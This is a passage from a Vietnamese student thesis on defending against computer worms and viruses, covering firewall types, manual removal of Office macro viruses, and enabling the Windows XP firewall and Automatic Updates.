  59. Khóa luận tốt nghiệp chống CHƢƠNG 3 : CÁCH PHÒNG CHỐNG Để phòng ngừa sự lây lan, phá hoại của sâu máy tính nói riêng và virus máy tính nói chung, hiện có rất nhiều phương pháp. Ở đây em xin trình bày một số cách phòng chống : dùng firewall, các thủ thuật, các phần mềm antivirus (chống virus), một số ý tưởng nhằm phát hiện, gỡ bỏ sâu, virus khỏi hệ thống. 3.1.Bức tƣờng lửa(Firewall) Ứng dụng bức tường lửa là cách mà người ta thường dùng để bảo vệ cho hệ thông tin của mình khỏi những xâm nhập bất hợp pháp từ phía ngoài mạng cũng như phía trong mạng. Hiểu đơn giản thì nó giống như trạm kiểm soát sẵn cho nó. 3.1.1. Khái niệm về Firewall Một hệ thống firewall là một tập hợp nhiều thành phần (bao gồm cả phần cứng và phần mềm) được sử dụng để tạo thành một rào chắn giữa một mang cần được bảo vệ và những mạng khác. Hệ thống firewall sẽ giữ lại các gói dữ liệu đi vào và đi ra khỏi mạng này, phân tích chúng, rồi quyết định cho chúng đi qua hoặc hủy bỏ chúng dựa trên một chính sách bảo vệ đã được thiết lập từ trước. Nói cách khác, một hệ thống firewall là một cơ chế để bảo vệ một mạng dùng riêng khi mạng này được kết nối với các mạng khác nhau không tin tưởng. Bằng việc kiểm soát tất cả các gói tin đi qua, firewall có thể thực hiện các chức năng cơ bản sau : Kiểm soát quyền truy nhập : Firewall chỉ cho phép những người dùng hợp lệ có quyền truy cập đến tài nguyên của mạng, xác định ai là người dùng được phép, tài nguyên nào họ được phép truy nhập và được phép truy nhập và được phép truy nhập như thế nào. Để thực hiện điều khiển quyền truy nhập, firewall phải hiểu được tất cả các dịch vụ và các ứng dụng đang hoạt động trên mạng. Hiện nay, chỉ có những firewall nào có thành phần kiểm tra toàn bộ trạng thái mới có thể được điều này. Những thế hệ firewall lọc gói tin đầu tiên không thể nhận biết được ứng Trần Thị Thúy_ Lớp CT901 56
  60. Khóa luận tốt nghiệp chống dụng nên không thực hiện được điều khiển quyền truy nhập. Loại thế hệ firewall thứ hai là các Proxy ứng dụng thì không thể cung cấp sự hỗ trợ kịp thời khi có các dịch vụ mới. Theo dõi truy nhập : Để tăng cường quản lý truy nhập, firewall có thể theo dõi, hiển thị, lập báo cáo và cảnh báo về những lưu thông mạng mà nó điều khiển. Dựa trên tính năng này, người quản trị hệ thống firewall có thể xem xét tất cả các kết nối hiện đang kích hoạt theo thời gian thực và có thể ngắt hoặc chặn các kết nối đó. Ghi lại nhật ký làm việc : Các firewall có thể tính toán về các thông tin truy nhập và thông tin của mọi kết nối một cách chi tiết bao gồm : Người dùng, loại dịch vụ, thời gian bắt đầu kết nối, đích đến của kết nối, quá trình kết nối, các hành động thực hiện khi có các kết nối đó, Đồng thời lập báo cáo phân tích chi tiết về những sự kiện này. Cảnh báo an ninh : Các firewall có thể đưa ra nhiều tùy chọn để cảnh báo như : Dùng email để thông báo, sử dụng giao thức SNMP để gửi các cảnh báo an ninh tới các hệ thống quản trị mạng Ngăn chặn các kiểu tấn công thông thường Một số firewall có thể chống được các kiểu tấn công như : Ipspoofing (giả mạo địa chỉ IP) 3.1.2. Các loại firewall 3.1.2.1. Firewall lọc gói tin (Packet Filtering Firewall) Firewall lọc gói tin thực hiện kiểm tra mỗi gói tin IP để xem nó có phù hợp với một trong các quy tắc đã được thiết lập trước, quyết định có cho phép gói tin đó đi qua firewall hay không. Các quy tắc này nhận biết liên lạc được phép dựa vào thông tin chứa trong các tiêu đề lớp mạng, lớp giao vận của gói tin và hướng được ghi trong phần tiêu đề của gói tin (từ trong mạng ra ngoài và ngược lại). Trần Thị Thúy_ Lớp CT901 57
  61. Khóa luận tốt nghiệp chống Các bộ lọc gói thường cho phép thao tác (chấp nhận hoặc từ chối) việc truyền dữ liệu dựa trên các điều khiển sau : Giao tiếp vật lý mà gói tin đến từ đó. Địa chỉ IP nguồn của gói tin Địa chỉ IP đích của gói tin Kiểu giao thức tầng vận chuyển (TCP, UDP, ICMP). Cổng nguồn của tầng vận chuyển. Cổng đích của tầng vận chuyển. Kỹ thuật lọc gói thường không hiểu các giao thức của tầng ứng dụng được sử dụng trong các gói tin. Thay vào đó, chúng làm việc bằng cách áp dụng một tập các quy tắc được duy trì đối với thông tin về TCP/IP. Vì loại firewall này không kiểm tra dữ liệu tầng ứng dụng của gói tin và không theo dõi trạng thái kết nối nên giải pháp này là kém an toàn nhất trong các công nghệ firewall. Nó cho phép truy cập thông qua firewall với số lượng kiểm tra rất nhỏ. Tất nhiên, vì nó xử lý ít hơn so với kỹ thuật firewall khác nên nó là công nghệ firewall nhanh nhất hiện có và thường được thực hiện trong các giải pháp phần cứng, chẳng hạn như các bộ định tuyến IP. Các firewall lọc gói thường thay địa chỉ cho các gói tin để luồng thông tin đi ra có địa chỉ nguồn khác với địa chỉ của máy trạm nội bộ. Quá trình ghi địa chỉ mới cho các gói tin được gọi là chuyển dịch địa chỉ mạng (Nework Address Translation - NAT). Sự chuyển dịch này sẽ che giấu các địa chỉ bên trong mạng cần bảo vệ 3.1.2.2. Firewall mức kết nối (Circuit Level Firewall) Firewall mức kết nối xác nhận tính hợp lệ của một gói tin là yêu cầu kết nối hay gói tin dữ liệu thuộc về một kết nối (hoặc một kết nối ảo) giữa hai tầng giao vận tương đương. Để phê chuẩn một phiên làm việc, firewall mức kết nối kiểm tra việc thiết lập kết nối để đảm bảo rằng kết nối này tạo ra một thủ tục bắt tay hợp lệ cho Trần Thị Thúy_ Lớp CT901 58
  62. Khóa luận tốt nghiệp chống giao thức tầng giao vận đang được sử dụng (thường là TCP). Ngoài ra các gói tin dữ liệu sẽ không được gửi cho đến khi thủ tục bắt tay được hoàn thành. Loại firewall này duy trì một bảng thông tin của các kết nối hợp lệ (bao gồm trạng thái của phiên làm việc đầy đủ và thông tin về thứ tự gói tin) và cho phép các gói tin chứa dữ liệu đi qua khi thông tin của gói tin này phù hợp với một mục trong bảng kết nối ảo. Mỗi lần một kết nối kết thúc thì mục chứa thông tin về kết nối này trong bảng kết nối ảo sẽ bị xóa và kết nối ảo giữa hai tầng giao vận tương đương cũng bị đóng. Khi một kết nối được thiết lập, firewall mức kết nối thường lưu giữ các thông tin về kết nối sau : Nhận dạng phiên làm việc duy nhất đối với kết nối này, nó được sử dụng cho các mục đích theo dõi, giám sát. Trạng thái của kết nối : Đang bắt tay, đã thiết lập hay kết thúc. Thông tin thứ tự các gói tin. Địa chỉ IP nguồn. Địa chỉ IP đích. Giao tiếp vật lý mà gói tin đến từ đó. Giao tiếp vật lý mà gói tin sẽ qua đó để đi ra. Sử dụng các thông tin này, firewall mức kết nối kiểm tra thông tin trong phần tiêu đề của mỗi gói tin để xác định xem liệu máy tính truyền có được phép gửi dữ liệu tới máy tính nhận hay không và máy tính nhận có quyền nhận dữ liệu đó hay không. Các firewall mức kết nối cho phép truy nhập qua firewall với một lượng kiểm tra tối thiểu bằng cách xây dựng một số kiểu trạng thái kết nối nhất định. Chỉ những gói tin thuộc về một kết nối đã có trong bảng mới được đi qua firewall. Khi nhận được một gói tin thiết lập kết nối, firewall mức kết nối kiểm tra các cơ sở luật của nó để xác định xem kết nối đó có được phép hay không. Nếu kết nối này là được phép, tất cả các gói tin kết hợp với kết nối này được Trần Thị Thúy_ Lớp CT901 59
  63. Khóa luận tốt nghiệp chống định tuyến thông qua firewall như đã được xác định trong bảng định tuyến của firewall mà không cần thêm các biện pháp kiểm tra an ninh khác. Các firewall mức kết nối có thể thực hiện một số biện pháp kiểm tra thêm để đảm bảo rằng gói tin không bị giả mạo và dữ liệu chứa trong tiêu đề của giao thức tầng giao vận tuân theo định nghĩa của giao thức đó. Nhờ đó, các firewall này có thể phát hiện ra một số kiểu dữ liệu của gói tin đã bị sửa đổi. Các firewall mức kết nối thường để địa chỉ mới cho các gói tin lớp mạng để luồng thông tin đi ra sẽ có địa chỉ nguồn là firewall mà không mang địa chỉ của một máy trạm nội bộ. Quá trình này được gọi là chuyển dịch địa chỉ, và bởi vì các firewall mức kết nối duy trì thông tin về từng phiên làm việc nên chúng có thể chuyển trả lại các gói tin đáp ứng từ mạng ngoài tới máy trạm nội bộ tương ứng một cách chính xác. 3.1.2.3. Firewall mức ứng dụng (Application Level Firewall) Firewall mức ứng dụng kiểm tra tính hợp lệ của các gói dữ liệu tại tầng ứng dụng trước khi cho phép thực hiện một kết nối. Nó kiểm tra tất cả các gói tin tại tầng ứng dụng và duy trì thông tin về trạng thái kết nối đầy đủ, thông tin về thứ tự. Ngoài ra, một firewall mức ứng dụng còn có thể phê chuẩn các mục bảo vệ an ninh khác mà nó chỉ xuất hiện trong dữ liệu tầng ứng dụng, chẳng hạn như mật khẩu người dùng và các yêu cầu dịch vụ. Hầu hết các firewall mức ứng dụng có phần mềm ứng dụng chuyên dụng và các dịch vụ ủy quyền. Các dịch vụ ủy quyền là các chương trình có mục đích riêng quản lý luồng thông tin đi qua một firewall đối với một dịch vụ cụ thể, chẳng hạn như : HTTP hoặc RTP. Các dịch vụ ủy quyền là riêng biệt đối với giao thức mà chúng được thiết kế để gửi chuyển tiếp, và chúng có thể cung cấp các điểu khiển truy nhập thêm, cung cấp các khả năng kiểm tra chi tiết kĩ lưỡng đối với các dữ liệu hợp lệ, tạo ra các hồ sơ thông kê về lượng thông tin mà chúng đã chuyển. Mỗi một proxy (ủy quyền) ứng dụng yêu cầu hai thành phần : Proxy server và proxy client. Mỗi proxy server hoạt động như một server đầu cuối cho Trần Thị Thúy_ Lớp CT901 60
  64. Khóa luận tốt nghiệp chống tất cả các yêu cầu kết nối xuất phát từ một client thực trong mạng nội bộ. Điều đó có nghĩa là : Tất cả các trao đổi thông tin giữa những người dùng của mạng nội bộ và mạng ngoài đều phải đi qua proxy server mà không cho phép những người dùng này trao đổi thông tin trực tiếp với các server khác bên ngoài mạng. Một người dùng nội bộ gửi một yêu cầu tới proxy server để kết nối tới một dịch vụ bên ngoài, chẳng hạn như : FTP hoặc Telnet. Proxy server sẽ kiểm tra các yêu cầu này và đưa ra quyết định chấp nhận hoặc từ chối yêu cầu dựa trên một bộ quy tắc được sử dụng cho từng dịch vụ mạng. Các proxy server hiểu giao thức của dịch vụ mà chúng đang kiểm tra, vì vậy chúng chỉ cho phép các gói tin tuân theo các định nghĩa giao thức này đi qua. Chúng cũng cho phép đưa thêm một số tiện ích như : Ghi lại thông kê chi tiết về thông tin phiên làm việc, xác thực người dùng và các lưu trữ tạm thời trên proxy. Một proxy client là một phần cứng của ứng dụng người dùng mà nó trao đổi với server thực hiện trên mạng ngoài nhân danh các client thực. khi một client yêu cầu một dịch vụ, proxy server kiểm tra yêu cầu đó dựa trên các quy định trong chính sách định nghĩa cho proxy đó và xác định xem có chấp thuận hay không. Nếu nó chấp thuận yêu cầu này, proxy server sẽ gửi yêu cầu này tới proxy client. Sau đó, proxy client sẽ nhân danh client này liên hệ với server thực và tiến hành chuyển tiếp các yêu cầu từ proxy server tới server thực và chuyển tiếp các đáp ứng từ server thực về proxy server. Một dịch vụ ủy quyền đặt một cách trong suốt giữa người dùng trong mạng nội bộ và một dịch vụ thực trên mạng ngoài. Đó là vì người dùng vẫn xử lý như chính dịch vụ thực xự. Ở phía dịch vụ thực, nó cũng vẫn xử lý như trực tiếp với một người dùng trên proxy server (thay cho máy trạm thật của người dùng này). Các dịch vụ uỷ quyền được thực hiện trên tầng cao nhất của mô hình OSI và chỉ hoạt động trong không gian ứng dụng của hệ điều hành. Bởi vậy, mỗi gói tin phải đi qua các giao thức mức dưới trong nhân trước khi đi đến không gian ứng dụng để các proxy kiểm tra kỹ lưỡng phần tiêu để và dữ liệu gói tin. Sau Trần Thị Thúy_ Lớp CT901 61
  65. Khóa luận tốt nghiệp chống đó, các gói tin này phải đi ngược trở lại đến nhân và được gửi đi. Bởi vì mỗi gói tin trong một phiên làm việc đều phải trải qua tiến trình này nên các dịch vụ ủy quyền có tốc độ rất chậm. 3.2. Một số biện pháp, thủ thuật phòng chống : 3.2.1. Biện pháp phòng chống virus macro Macro virus có thể vô cùng nguy hiểm khi phá hoại nhưng có thể phòng chống nó tương đối dễ dàng. Đương nhiên, nếu có những chương trinh đủ mới và mạnh thì chỉ cần thi hành các chương trình này để phòng chống virus là đủ (trừ khi virus macro là rất mới so với chương trình kiểm tra và diệt virus). Với những trường hợp không có những chương trình kiểm tra và diệt virus đủ mới và mạnh thì có thể thực hiện một số bước ban đầu như sau khi nghi ngờ máy tính bị nhiễm virus macro : 1. Tắt toàn bộ các ứng dụng Office như Microsoft Word, Excel, Power Point. 2. Vào Folders Program Files\Microsoft Office\Templates hoặc Folder Templates trong Folder chứa bộ chương trình Office. Tìm trong Folder này tệp Normal.Dot. Xóa tệp này. 3. Nếu trên máy tính có các tệp template khác (phần mở rộng là DOT), bị nhiễm virus macro thì cũng phải xóa các tệp template này. Các bước trên nhằm hạn chế virus lây lan từ các tệp định dạng (templates) sang các tệp tài liệu sạch sẽ hoặc tệp mới được tạo ra. Cũng cần chú ý là các bước 1, 2 và 3 được thực hiện nếu trong các tệp template không chứa những định dạng quan trọng, ảnh hưởng tới nhiều tài liệu khác trên máy tính. Các bước tiếp theo đây là nhằm khống chế virus không lây lan từ các tệp tài liệu đã bị nhiễm mà vẫn có thể làm việc tạm thời với các tài liệu này ở chế độ Read – Only. Trần Thị Thúy_ Lớp CT901 62
  66. Khóa luận tốt nghiệp chống 1. Mở ứng dụng của Microsoft Office, chọn menu Tools, trong menu này chọn Option Trong cửa sổ Option chọn General, đánh dấu ở hộp Macro virus protection. 2. Sau khi đặt Macro virus protection như trên mỗi khi mở tệp tài liệu có chứa macro (lành hoặc virus) sẽ xuất hiện câu hỏi : Nếu chọn Disable Macros thì sẽ mở tài liệu ở dạng Read – Only. Nếu chọn Enable Macros thì các macros sẽ được kích hoạt. 3. Mặc dù chọn Disable Macros thì tài liệu chỉ được mở ở dạng Read – Only nhưng macro virus không được kích hoạt và có thể vào xem virus được : Chọn menu Tools -> Macro -> Visual Basic Editor ; Trong cửa sổ Microsoft Visual Basic [ This Document] này chọn hộp Project -> [ Tên Document] -> Microsoft Word Object -> Tên Macro. Chuyển sang ô cửa sổ soạn thảo đoạn mã nguồn của Macro, xóa toàn bộ đoạn mã nguồn. Ghi tài liệu dưới dạng Save As. Quay lại xóa tài liệu cũ (vẫn còn chứa Macro). 3.2.2. Cách bảo vệ máy tính Việc cập nhật một số gói phần mềm nhất định có thể cải thiện tính bảo mật dưới đây là 3 bước có thể thực hiện để cải thiện tính bảo mật cho máy tính. Bƣớc 1 : Dùng một chƣơng trình Tƣờng lửa Internet Một chương trình tường lửa Internet có thể giúp bảo vệ máy tính không bị người ngoài trên Internet xâm nhập. Nếu dùng Microsoft Windows® XP, chúng ra nên bật tính năng tường lửa có sẵn. 1. Kiểm tra xem đang dùng Windows XP hay không bằng cách bấm vào nút Start, sau đó bấm Run ; gõ winver trong hộp thoại Run. Bấm OK. 2. Bấm vào nút Start, sau đó chọn Control Panel. 3. Bấm Network and Internet Connections, sau đó chọn Network Connections. Mẹo vặt : Nếu không tìm thấy mục Network and Internet Connections, hãy bấm vào Switch to Category View ở phía trên bên trái màn hình của bạn. Trần Thị Thúy_ Lớp CT901 63
  67. Khóa luận tốt nghiệp chống 4. Dưới mục Dial – Up hoặc LAN or High Speed Internet, bấm vào biểu tượng kết nối bạn muốn bảo vệ. 5. Trong thanh tác vụ bên trái, phía dưới Network Tasks, chon Change settings of thí connection (hoặc bấm chuột phải vào kết nối bạn muốn bảo vệ và chọn Properties). 6. Trên Advanced tab, trong Internet Connection Firewall, đánh dấu chọn ô Protect my computer and network by limiting or preventing access to this computer from the Internet 7. Nếu có nhiều kết nối Internet, chẳng hạn như một kết nối băng thông rộng và một kết nối quay số, hãy lặp lại các bước từ 5 – 7 cho mỗi kết nối. Trần Thị Thúy_ Lớp CT901 64
  68. Khóa luận tốt nghiệp chống Bƣớc 2 : Cập nhật máy tính Hệ điều hành Windowns XP có tính năng Automatic Updates với khả năng tự động tải về các cập nhật bảo mật mới khi máy tính của bạn bật và kết nối vào Internet. Để khai thác tối đa lợi ích của Automatic Updates, hãy chạy Windows Updates và quét máy tính trước tiên. 1. Bấm vào nút Start, chọn All Programs, sau đó bấm Windows Update. 2. Làm theo các hướng dẫn trên màn hình của Windows Updates sẽ quét máy tính và đưa ra một danh sách các cập nhật thiết yếu nhất. Mẹo vặt : Để giảm số lần tải cập nhật, hãy chạy Windows Update khi không dùng máy vào các tác vụ khác. Thời gian tải cập nhật sẽ khác nhau tùy thuộc vào thời gian bao lâu kể từ lần cuối cập nhật, số lượng và kích cỡ các file đang tải về, và tốc độ modem của các modem tốc độ chậm có thể khiến việc tải về từ Windows Update tất cả các cập nhật được khuyến cáo trong lần đầu tiên mất nhiều giờ. 3. Cài các bản cập nhật Thủ thuật : Một số bản cập nhật yêu cầu phải cài đặt bản cập nhật khác trước đó và khởi động lại máy tính. Quay lại Windows Update sau khi khởi động lại máy để kiểm tra xem máy có cần tải thêm bản cập nhật nào nữa không. 4. Sau khi Windows XP của bạn đã được cập nhật, hãy thiết lập một lịch kiểm tra thường xuyên cho Automatic Updates. 1. Bấm vào nút Start, sau đó chon Control Panel. 2. Bấm vào Performance and Maintenance. 3. Bấm vào System để mở hộp thoại System Properties. 4. Trên Automatic Updates, đánh dấu chọn ô Keep my computer up to date. 5. Chọn một chế độ. Microsoft khuyến cáo chọn ô Automatically download the updates, and install them on the schedule that I specify. Trần Thị Thúy_ Lớp CT901 65